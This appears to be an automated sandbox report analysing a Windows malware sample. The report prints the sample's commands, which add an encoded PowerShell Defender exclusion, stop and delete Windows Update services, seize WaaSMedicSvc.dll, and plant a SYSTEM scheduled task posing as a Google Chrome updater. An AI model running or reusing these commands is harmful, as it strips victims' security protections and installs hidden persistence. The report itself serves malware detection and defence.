Analysis
-
max time kernel
38s -
max time network
42s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
23-08-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
Resource
win7-20220812-en
General
-
Target
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe
-
Size
1.8MB
-
MD5
707de025f2ab727fbb3b33f4ff8b97b3
-
SHA1
51a571a425a36cbbc3103d5e9991d080ccd4abc6
-
SHA256
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea
-
SHA512
256104c78b6f4a7ae7698a5dfa208526583124aec0be194b267e7ab83ed29b0fd893cd3fb829d1d11ef5abcb94192bdf2993780c5a6b8caebe6fb40d1fadf91c
-
SSDEEP
49152:Y1uZMQTHvWorKzx/L9GJENaYcBLxH030Du:Y1ueoH6xYJEHcU3Z
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 1332 takeown.exe 1936 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
Processes:
icacls.exetakeown.exepid process 1936 icacls.exe 1332 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Program Files directory 2 IoCs
Processes:
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 756 sc.exe 656 sc.exe 1860 sc.exe 632 sc.exe 1304 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1076 reg.exe 1508 reg.exe 2020 reg.exe 1476 reg.exe 860 reg.exe 1256 reg.exe 1792 reg.exe 1012 reg.exe 1844 reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exepid process 824 powershell.exe 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exetakeown.exe3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exedescription pid process Token: SeDebugPrivilege 824 powershell.exe Token: SeTakeOwnershipPrivilege 1332 takeown.exe Token: SeDebugPrivilege 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.execmd.execmd.execmd.exedescription pid process target process PID 2000 wrote to memory of 824 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 2000 wrote to memory of 824 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 2000 wrote to memory of 824 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe powershell.exe PID 2000 wrote to memory of 1708 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1708 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1708 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 1708 wrote to memory of 756 1708 cmd.exe sc.exe PID 1708 wrote to memory of 756 1708 cmd.exe sc.exe PID 1708 wrote to memory of 756 1708 cmd.exe sc.exe PID 1708 wrote to memory of 656 1708 cmd.exe sc.exe PID 1708 wrote to memory of 656 1708 cmd.exe sc.exe PID 1708 wrote to memory of 656 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1860 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1860 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1860 1708 cmd.exe sc.exe PID 1708 wrote to memory of 632 1708 cmd.exe sc.exe PID 1708 wrote to memory of 632 1708 cmd.exe sc.exe PID 1708 wrote to memory of 632 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1304 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1304 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1304 1708 cmd.exe sc.exe PID 1708 wrote to memory of 1076 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1076 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1076 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1508 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1508 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1508 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1256 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1256 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1256 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1792 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1792 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1792 1708 cmd.exe reg.exe PID 1708 wrote to memory of 2020 1708 cmd.exe reg.exe PID 1708 wrote to memory of 2020 1708 cmd.exe reg.exe PID 1708 wrote to memory of 2020 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1332 1708 cmd.exe takeown.exe PID 1708 wrote to memory of 1332 1708 cmd.exe takeown.exe PID 1708 wrote to memory of 1332 1708 cmd.exe takeown.exe PID 1708 wrote to memory of 1936 1708 cmd.exe icacls.exe PID 1708 wrote to memory of 1936 1708 cmd.exe icacls.exe PID 1708 wrote to memory of 1936 1708 cmd.exe icacls.exe PID 2000 wrote to memory of 1540 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1540 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1540 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1764 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1764 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 2000 wrote to memory of 1764 2000 3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe cmd.exe PID 1540 wrote to memory of 1316 1540 cmd.exe schtasks.exe PID 1540 wrote to memory of 1316 1540 cmd.exe schtasks.exe PID 1540 wrote to memory of 1316 1540 cmd.exe schtasks.exe PID 1764 wrote to memory of 336 1764 cmd.exe schtasks.exe PID 1764 wrote to memory of 336 1764 cmd.exe schtasks.exe PID 1764 wrote to memory of 336 1764 cmd.exe schtasks.exe PID 1708 wrote to memory of 1012 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1012 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1012 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1476 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1476 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1476 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1844 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1844 1708 cmd.exe reg.exe PID 1708 wrote to memory of 1844 1708 cmd.exe reg.exe PID 1708 wrote to memory of 860 1708 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"C:\Users\Admin\AppData\Local\Temp\3ac089bcf6392437c03aca380de9d6faee049448d3e49edcf72e5ba6024958ea.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG4AdABoAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGsAcgB4ACMAPgA="2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/336-81-0x0000000000000000-mapping.dmp
-
memory/632-69-0x0000000000000000-mapping.dmp
-
memory/656-67-0x0000000000000000-mapping.dmp
-
memory/756-66-0x0000000000000000-mapping.dmp
-
memory/824-61-0x000000001B750000-0x000000001BA4F000-memory.dmpFilesize
3.0MB
-
memory/824-59-0x000007FEEB720000-0x000007FEEC27D000-memory.dmpFilesize
11.4MB
-
memory/824-60-0x0000000002804000-0x0000000002807000-memory.dmpFilesize
12KB
-
memory/824-62-0x000000000280B000-0x000000000282A000-memory.dmpFilesize
124KB
-
memory/824-63-0x0000000002804000-0x0000000002807000-memory.dmpFilesize
12KB
-
memory/824-64-0x000000000280B000-0x000000000282A000-memory.dmpFilesize
124KB
-
memory/824-58-0x000007FEEC280000-0x000007FEECCA3000-memory.dmpFilesize
10.1MB
-
memory/824-56-0x0000000000000000-mapping.dmp
-
memory/860-85-0x0000000000000000-mapping.dmp
-
memory/1012-82-0x0000000000000000-mapping.dmp
-
memory/1032-92-0x0000000000000000-mapping.dmp
-
memory/1076-71-0x0000000000000000-mapping.dmp
-
memory/1084-86-0x0000000000000000-mapping.dmp
-
memory/1256-73-0x0000000000000000-mapping.dmp
-
memory/1288-91-0x0000000000000000-mapping.dmp
-
memory/1304-70-0x0000000000000000-mapping.dmp
-
memory/1316-80-0x0000000000000000-mapping.dmp
-
memory/1332-76-0x0000000000000000-mapping.dmp
-
memory/1476-83-0x0000000000000000-mapping.dmp
-
memory/1508-72-0x0000000000000000-mapping.dmp
-
memory/1540-78-0x0000000000000000-mapping.dmp
-
memory/1684-90-0x0000000000000000-mapping.dmp
-
memory/1708-65-0x0000000000000000-mapping.dmp
-
memory/1736-88-0x0000000000000000-mapping.dmp
-
memory/1764-79-0x0000000000000000-mapping.dmp
-
memory/1792-74-0x0000000000000000-mapping.dmp
-
memory/1844-84-0x0000000000000000-mapping.dmp
-
memory/1860-68-0x0000000000000000-mapping.dmp
-
memory/1936-77-0x0000000000000000-mapping.dmp
-
memory/1952-87-0x0000000000000000-mapping.dmp
-
memory/1980-89-0x0000000000000000-mapping.dmp
-
memory/2000-55-0x000007FEFB761000-0x000007FEFB763000-memory.dmpFilesize
8KB
-
memory/2000-54-0x000000013F330000-0x000000013F50E000-memory.dmpFilesize
1.9MB
-
memory/2020-75-0x0000000000000000-mapping.dmp